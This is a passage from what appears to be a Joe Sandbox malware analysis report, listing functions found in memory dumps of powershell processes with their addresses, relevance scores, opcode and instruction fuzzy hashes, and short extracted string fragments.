                                          Function 00007FF886FB6609 Relevance: .5, Instructions: 474COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2072070098.00007FF886FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 628e6bdb08a72518360cec343e8339f5522e84c51d86d40147c6a4c66997dc78
                                          • Instruction ID: 9eac13ed206e97c97cc1cfec578b590f15d7c124ad0baff94e236b91118edc1d
                                          • Opcode Fuzzy Hash: 628e6bdb08a72518360cec343e8339f5522e84c51d86d40147c6a4c66997dc78
                                          • Instruction Fuzzy Hash: F3E1F132E0DA8E4FE7959B284865AB57BE1FF5A7A0B5C01BAD00DC71E2DE18EC05C341
                                          Function 00007FF886FB7625 Relevance: .4, Instructions: 422COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2072070098.00007FF886FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cba9a78eb15e5cabc98f446e3995b5eed6b405e3ef141c4241d220abeb805783
                                          • Instruction ID: 72b09d0863f7f0f4abc1190c94f935ba16533173a772c1b609f9c5f736e46ca6
                                          • Opcode Fuzzy Hash: cba9a78eb15e5cabc98f446e3995b5eed6b405e3ef141c4241d220abeb805783
                                          • Instruction Fuzzy Hash: A8D12132E0DA9E4FE7969A6858556B4BBE1FF562A0B5C01FAC10DC71D3EE18EC05C342
                                          Function 00007FF886FB67A7 Relevance: .2, Instructions: 156COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2072070098.00007FF886FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2dd606c5396b417d46926c5d1bc7062c77b3de4f636eaae5844841401c34bb7b
                                          • Instruction ID: b6362ab0a80ea5e33d2db3da9ce0010f2c4afea969660b145bf38b781ce348ff
                                          • Opcode Fuzzy Hash: 2dd606c5396b417d46926c5d1bc7062c77b3de4f636eaae5844841401c34bb7b
                                          • Instruction Fuzzy Hash: CA51A462D1DA8E5FE79597684861AB4BAE1FF5A7A0B5C01F9D00CC71E2DD1CEC44C302
                                          Function 00007FF886FB7822 Relevance: .1, Instructions: 112COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2072070098.00007FF886FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886FB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886fb0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22509bde3acec883ade9e94da59b305751da03c49e774dc222ef04ae88a183df
                                          • Instruction ID: e3b432c7024e17c4b7631daaaabd4d5ae4d0b50e0450753920f6e76ee58756d1
                                          • Opcode Fuzzy Hash: 22509bde3acec883ade9e94da59b305751da03c49e774dc222ef04ae88a183df
                                          • Instruction Fuzzy Hash: 6631D062D1EA9F1BF2A6966818112B8AAD1FF157A0B6C05BAD20DD31D3ED0CEC04C342
                                          Function 00007FF886EE3535 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2070951122.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886ee0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                          • Instruction ID: ae113b718360fcc78e040c5d69947053363175cf3dc4a98d72d452be364208e0
                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                          • Instruction Fuzzy Hash: EE01677111CB0C4FD748EF0CE455AA5B7E0FB95364F10056DE58AC3651DA36E881CB46

                                          Non-executed Functions

                                          Function 00007FF886EE89F2 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2070951122.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886ee0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: K_^$K_^$K_^$K_^
                                          • API String ID: 0-4267328068
                                          • Opcode ID: fe0de88e22ac318130e52982036a11c0e5c035e1ca020a5f65c5ce5bb77f47ae
                                          • Instruction ID: 41dedb51260d3268a9299a4835b59453ebf62ec0e5a2eed2b62bad60fd2029fb
                                          • Opcode Fuzzy Hash: fe0de88e22ac318130e52982036a11c0e5c035e1ca020a5f65c5ce5bb77f47ae
                                          • Instruction Fuzzy Hash: C3319062D4D9D35FE24756285CA90FABF60BF62398B5D01F2C0DC8F0D3EE18684382A1

                                          Executed Functions

                                          Function 0481F1F0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Vj
                                          • API String ID: 0-3251626932
                                          • Opcode ID: b33d892cedb6da2c244b852e23403830a1d7b03bba4e02856e0aec3bb4163cad
                                          • Instruction ID: da5c89ba76c9250be4a2394f824a2b42bae18477b9a9c12007cfac5f5969737c
                                          • Opcode Fuzzy Hash: b33d892cedb6da2c244b852e23403830a1d7b03bba4e02856e0aec3bb4163cad
                                          • Instruction Fuzzy Hash: EBB14271E00209CFDB10CFA9D8857DEBBF6BF88314F148A2AD615E7264EB74A845CB45
                                          Function 0481FAC0 Relevance: .3, Instructions: 266COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8bd51391d840b532a331c50408eeae3a82038690f5283777da273d9892905d0
                                          • Instruction ID: e8933722b79b87c8d4330a507cd0646fc241dad5ba3eca01e5efe48b7b1d430b
                                          • Opcode Fuzzy Hash: d8bd51391d840b532a331c50408eeae3a82038690f5283777da273d9892905d0
                                          • Instruction Fuzzy Hash: 53B18771E00309CFDB10CFA9D8957DDBBF6AF48314F148A2AD615E7264EB74A845CB81
                                          Function 04819AD9 Relevance: .1, Instructions: 119COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc9a044803e0f11c139bac10e836cdce2420224bfbc9db5c3b1d66ed156097e5
                                          • Instruction ID: 8d7f939eaee8265aad36291829e71256641c218e0dbd0a8f7c180a1a72e4cc50
                                          • Opcode Fuzzy Hash: fc9a044803e0f11c139bac10e836cdce2420224bfbc9db5c3b1d66ed156097e5
                                          • Instruction Fuzzy Hash: C7417A71B002548FD7149B65C8A8BAABBF6FF89750F144969E406EB7A0DF34AC41CB50
                                          Function 07687110 Relevance: 13.5, Strings: 10, Instructions: 1048COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$(fEl$(fEl$(fEl$(fEl$(fEl$(fEl$x.6k$-6k
                                          • API String ID: 0-2422737603
                                          • Opcode ID: 2caf3c896b0fe116dced22967d42b3c777cc80a8b93ccde01d6b15c0b9832842
                                          • Instruction ID: f30ed4b776830d6d788f13ba6ccc5d1c18a9b54b84dea680b4b6ebc37f5bbea0
                                          • Opcode Fuzzy Hash: 2caf3c896b0fe116dced22967d42b3c777cc80a8b93ccde01d6b15c0b9832842
                                          • Instruction Fuzzy Hash: 3C82B8B4B10215DFDB64EBA4C850FAAB7B2AF85300F24C66AD50AAF345DB71DC41CB91
                                          Function 07686468 Relevance: 9.6, Strings: 7, Instructions: 833COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$(fEl$(fEl$(fEl$;l$;l
                                          • API String ID: 0-2228137991
                                          • Opcode ID: 6c67ab2a9ed6d47ad87a9fc1421d5741da2ca4a3aade43bf3d02ee0299a51159
                                          • Instruction ID: 32e5380b7e54b7582eab36c0884d64e6ac235dd1e2542c9adf4247672ec5eb3a
                                          • Opcode Fuzzy Hash: 6c67ab2a9ed6d47ad87a9fc1421d5741da2ca4a3aade43bf3d02ee0299a51159
                                          • Instruction Fuzzy Hash: BC7267B4B003058FD754DBA8C854F9AB7B2AF89304F24C169E90A9F756DB72ED42CB41
                                          Function 0481BB00 Relevance: 6.8, Strings: 5, Instructions: 517COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8Nj$h]j$h]j$h]j$Ij
                                          • API String ID: 0-1679908211
                                          • Opcode ID: 2b4082c073482885dcd616f573d8d192335e8f76e5b41779343ac180cf9b9dd1
                                          • Instruction ID: f972efac714a620beedcec79e8783cbcd75d233e4bc7c4534c5fe053eaf52a50
                                          • Opcode Fuzzy Hash: 2b4082c073482885dcd616f573d8d192335e8f76e5b41779343ac180cf9b9dd1
                                          • Instruction Fuzzy Hash: E0226130B402148FDB25DB64D8546AEB7B6BF89304F1485EAD40AEB361DF35AD81CF91
                                          Function 07687B23 Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$x.6k$x.6k$-6k
                                          • API String ID: 0-2873535965
                                          • Opcode ID: f451672bfef46667d34e50037cd6f447e5f0c3155c056344fc07d6b1ccf43589
                                          • Instruction ID: cf767d26c5dd49534badcb28a64b6e20ef352f0c4c39f8bf06c4de8ad9f170f8
                                          • Opcode Fuzzy Hash: f451672bfef46667d34e50037cd6f447e5f0c3155c056344fc07d6b1ccf43589
                                          • Instruction Fuzzy Hash: 5EF1C4B4B002159FEB24EB68C950F6EB7B3AF84340F10C1A9D5096F781DB75ED818B91
                                          Function 07686466 Relevance: 4.4, Strings: 3, Instructions: 636COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$;l
                                          • API String ID: 0-2467197750
                                          • Opcode ID: 4e9c4fa48ff8a55b5f2b05c9ebd80aed184871d7d4d2576ead1308bbe6eb035f
                                          • Instruction ID: 8e724a804588e8a603b51c93c312f919b7cfaf1e235c3cf20163e56e701bc02b
                                          • Opcode Fuzzy Hash: 4e9c4fa48ff8a55b5f2b05c9ebd80aed184871d7d4d2576ead1308bbe6eb035f
                                          • Instruction Fuzzy Hash: 274247B8B00205DFD750DB58C980F99B7B2AF88314F158299E90A9F756DB72ED42CB41
                                          Function 076860C0 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$x.6k
                                          • API String ID: 0-2296717983
                                          • Opcode ID: 6cd7f17f0447ab2ee4ac3385fbe0f00774c5a039de98ad22f86f6c3378af4002
                                          • Instruction ID: 70f7c91df2ea188285c698dc25cb025a8e0c3cdfc0c054e842752cb352dd37a4
                                          • Opcode Fuzzy Hash: 6cd7f17f0447ab2ee4ac3385fbe0f00774c5a039de98ad22f86f6c3378af4002
                                          • Instruction Fuzzy Hash: B391B2B4B002049FE714EB68C954FAEB7F3AF88344F108169E9066F746DB76EC418B91
                                          Function 076824D0 Relevance: 3.0, Strings: 2, Instructions: 465COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl
                                          • API String ID: 0-1949706082
                                          • Opcode ID: e7f8fd35275371a3c472fcb9e63b75d700c1d1cbc6abb0386e2e3368ef5c3e39
                                          • Instruction ID: 9f9a87be4a50fc2c7b4b95fb2d6f74685429da1e87b365c9e9f991f4cd51bef4
                                          • Opcode Fuzzy Hash: e7f8fd35275371a3c472fcb9e63b75d700c1d1cbc6abb0386e2e3368ef5c3e39
                                          • Instruction Fuzzy Hash: 910290B4B402059FDB54DBA8C450FAAB7F2BF89314F14C25AE80A9F751DA72EC42CB51
                                          Function 07686D51 Relevance: 3.0, Strings: 2, Instructions: 459COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl
                                          • API String ID: 0-1949706082
                                          • Opcode ID: c98ec00c72ad879ab9cc819732efe07b5c0fd414bece35f47a94a17f399202b0
                                          • Instruction ID: bbf4be06af09a519c10c764f0bf2a8ef0912a06483b48c5fb90293f1ab6bed71
                                          • Opcode Fuzzy Hash: c98ec00c72ad879ab9cc819732efe07b5c0fd414bece35f47a94a17f399202b0
                                          • Instruction Fuzzy Hash: 64126BB8B00205DFD750DB58C981F99B7B2AF85304F25C1A9E90A9F752DB72ED82CB41
                                          Function 07682973 Relevance: 2.9, Strings: 2, Instructions: 409COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$h28k
                                          • API String ID: 0-2153933611
                                          • Opcode ID: 1076a0ae28633b7e667faa701d09d486baef230d96964db34e6b1ba3975207cc
                                          • Instruction ID: c21389b360beb574b5eb9eeba5fa5de4f1c95af6aeb9168f64580117830b4e04
                                          • Opcode Fuzzy Hash: 1076a0ae28633b7e667faa701d09d486baef230d96964db34e6b1ba3975207cc
                                          • Instruction Fuzzy Hash: 9AF17DB4B412019FEB50DB68C550FA9B7B2BF88314F14C25AE80AAF751D7B2EC52CB51
                                          Function 07688930 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: x.6k$-6k
                                          • API String ID: 0-1826518464
                                          • Opcode ID: 4a3d58a789ed2f393be64a1ac5492cd962ff73eeb2a0e5dab4b9636105e72270
                                          • Instruction ID: d490bcd0eb0e9060a77128417936f26cb209d23a19d767b2ef9ec3054f8f50aa
                                          • Opcode Fuzzy Hash: 4a3d58a789ed2f393be64a1ac5492cd962ff73eeb2a0e5dab4b9636105e72270
                                          • Instruction Fuzzy Hash: B4D1ADB4B20205DBEB04EB68C540FAEB7B2AF88344F51C529D5066F395DB76EC42CB91
                                          Function 07688910 Relevance: 2.8, Strings: 2, Instructions: 272COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: x.6k$-6k
                                          • API String ID: 0-1826518464
                                          • Opcode ID: ecd5f0c2cb596d1d79d198d58047348295202ec14a08da314b025e8414f1fe59
                                          • Instruction ID: 5523c4a0db7f62f0a5e7d6efae81d130d024d6e39fb2a9b8dc5b1012a46c3dcd
                                          • Opcode Fuzzy Hash: ecd5f0c2cb596d1d79d198d58047348295202ec14a08da314b025e8414f1fe59
                                          • Instruction Fuzzy Hash: A9B1CFB4A10206DFDB14EB68C540FAEB7B2AF88344F51C129D8066F395CB76EC42CB91
                                          Function 076860BE Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$x.6k
                                          • API String ID: 0-1539590958
                                          • Opcode ID: a74dccfcb31e80ba17d6c1478b3df5185b5c4f23a7e7c2cb769ccf9514e392dc
                                          • Instruction ID: 00c79170c9d4a0b8ac991944c5e880ed83247d2e89e18bdfdb8432597dae75cc
                                          • Opcode Fuzzy Hash: a74dccfcb31e80ba17d6c1478b3df5185b5c4f23a7e7c2cb769ccf9514e392dc
                                          • Instruction Fuzzy Hash: 3C819EB4B002009BE714EB68C950F9EB7F3AF88318F108569E9066F356DB76EC41CB91
                                          Function 0481C7B8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: h]j$Ij
                                          • API String ID: 0-195636185
                                          • Opcode ID: 3f1613d06ac5158eb86362dc44f5ff644225897cd783e283ad659d27286dc022
                                          • Instruction ID: 099c455100fcf10290aac607be61585717089ff6cf6449e486f8d25e3ed7303d
                                          • Opcode Fuzzy Hash: 3f1613d06ac5158eb86362dc44f5ff644225897cd783e283ad659d27286dc022
                                          • Instruction Fuzzy Hash: 71311930A012288FDB25DB64D8557EEB7B6BF49305F1049EAD409AB361CF75AE81CF81
                                          Function 076824B4 Relevance: 1.6, Strings: 1, Instructions: 386COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl
                                          • API String ID: 0-3247602028
                                          • Opcode ID: abee32f79bbe252187f21123d8c09457a209c86ea673ad6f2f99b8f4cbee9c3b
                                          • Instruction ID: de2bc853735b5af555d8f3400f4a4a8e40875e3eca7e34414dd42d3ab4af2a67
                                          • Opcode Fuzzy Hash: abee32f79bbe252187f21123d8c09457a209c86ea673ad6f2f99b8f4cbee9c3b
                                          • Instruction Fuzzy Hash: 3EF159B4B412019FDB50DFA8C590EA9B7B2BF88314F14C25AE80AAF755D772EC42CB51
                                          Function 0481F1E4 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Vj
                                          • API String ID: 0-3251626932
                                          • Opcode ID: 56f127a89eb7fad02319328e580fbc5291ebd2bd3fcef1a338d8fb1aa650c209
                                          • Instruction ID: 2022b1cab35740323ecf56a7be3f2a28c42d0a4b6ade4e5986efde845da5a214
                                          • Opcode Fuzzy Hash: 56f127a89eb7fad02319328e580fbc5291ebd2bd3fcef1a338d8fb1aa650c209
                                          • Instruction Fuzzy Hash: 9CB15F71E00209CFDB10CFA9D8857DEBBF5BF48314F148A2ADA15E7264EB74A845CB85
                                          Function 076844EC Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 84Cl
                                          • API String ID: 0-2833871787
                                          • Opcode ID: 7ae15ce39838bfcf9a1efc9bc874529b461ea229cd3ae36f6e8608c1b01d9116
                                          • Instruction ID: 69c86b07ea23d2c731155766fd2c838401fbee3bacb0e77208e16a7aaeb221a2
                                          • Opcode Fuzzy Hash: 7ae15ce39838bfcf9a1efc9bc874529b461ea229cd3ae36f6e8608c1b01d9116
                                          • Instruction Fuzzy Hash: 465129B07093D28FD712DF64D850B59BFB1AF82311F19C69BD8469F292CA318C46CB62
                                          Function 07688D56 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: x.6k
                                          • API String ID: 0-3999274272
                                          • Opcode ID: db488a353a92e3b275d4ca749b8ed83aef833148d2a8ceecf22ed4daa39457a4
                                          • Instruction ID: 5f38a111a97f0adcd5f6ecc9cb759f126f605beeae0413f86e18bcfed56e2dbf
                                          • Opcode Fuzzy Hash: db488a353a92e3b275d4ca749b8ed83aef833148d2a8ceecf22ed4daa39457a4
                                          • Instruction Fuzzy Hash: 82319378B50214AFE704E768C954FAE77B3AFC4394F11C429EA016F391DEBA9C418B91
                                          Function 076891D0 Relevance: .5, Instructions: 496COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 497c228e5394dd145c28f6c3ca055a9645bafe6e77f11df18131e1973d4cdcb5
                                          • Instruction ID: cffe4ef48d7cc6ddda6ac5729a0809ace796bf740b7e7cb4974c0b86156dca1b
                                          • Opcode Fuzzy Hash: 497c228e5394dd145c28f6c3ca055a9645bafe6e77f11df18131e1973d4cdcb5
                                          • Instruction Fuzzy Hash: 4CF124B1B14306CFDB64AA79D450BBAB7E1AFC5311F1482AAD507DB341DA31E841C7A2
                                          Function 07681D28 Relevance: .3, Instructions: 335COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00deae9767966a36ff4e8a579c44259dd5a9637ffb5f745074e16bd4cd96d883
                                          • Instruction ID: 2b4bc48079fb208b48b0cecc151e4a317eb53ed452aa5a0e3bdc4ffeb45ea214
                                          • Opcode Fuzzy Hash: 00deae9767966a36ff4e8a579c44259dd5a9637ffb5f745074e16bd4cd96d883
                                          • Instruction Fuzzy Hash: 89B128B1704209DFDB68AA79D810BAAB7E2FF86251F24C26FD5478B341DB35C842C791
                                          Function 04814EA8 Relevance: .3, Instructions: 332COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87b54c885378df2136bd9e2021000a1df838d6d4b09bb63ea0ec4ee9a34c33f6
                                          • Instruction ID: 4acaf4895280c966c50d9464eb975647f58d0bddf19f41079740cd7774d274e6
                                          • Opcode Fuzzy Hash: 87b54c885378df2136bd9e2021000a1df838d6d4b09bb63ea0ec4ee9a34c33f6
                                          • Instruction Fuzzy Hash: 08D14075A00218EFDB04CF98D484A9DBBB6FF89314F24865AE805EB361D735ED42CB90
                                          Function 048145C0 Relevance: .3, Instructions: 321COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c904e1f5c03a90f7f4b718993441d77c0c4fe0928693a5f6bb7b127a6587272c
                                          • Instruction ID: 6e8462dd8eb63f23d1bc0cce524aaa5008da6052d0ec5969edc74b0059f916dd
                                          • Opcode Fuzzy Hash: c904e1f5c03a90f7f4b718993441d77c0c4fe0928693a5f6bb7b127a6587272c
                                          • Instruction Fuzzy Hash: 12D10574A002199FDB05CF98D484A9DFBB6FF88714F24865AE805EB365C735EC82CB90
                                          Function 04819580 Relevance: .3, Instructions: 320COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1812f7100717b2412f68c8392a24fe2bee59c593d08d1e3c9fe3e84824f930d1
                                          • Instruction ID: 5583dd0174d59bda647d147865ce69f3232a355e84770d1eec3b0097370df7c3
                                          • Opcode Fuzzy Hash: 1812f7100717b2412f68c8392a24fe2bee59c593d08d1e3c9fe3e84824f930d1
                                          • Instruction Fuzzy Hash: D6C1AF71A002488FDB14DFA4D494A9DBBFAFF85310F158A5AE406EB365DB34ED89CB40
                                          Function 07689850 Relevance: .3, Instructions: 289COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
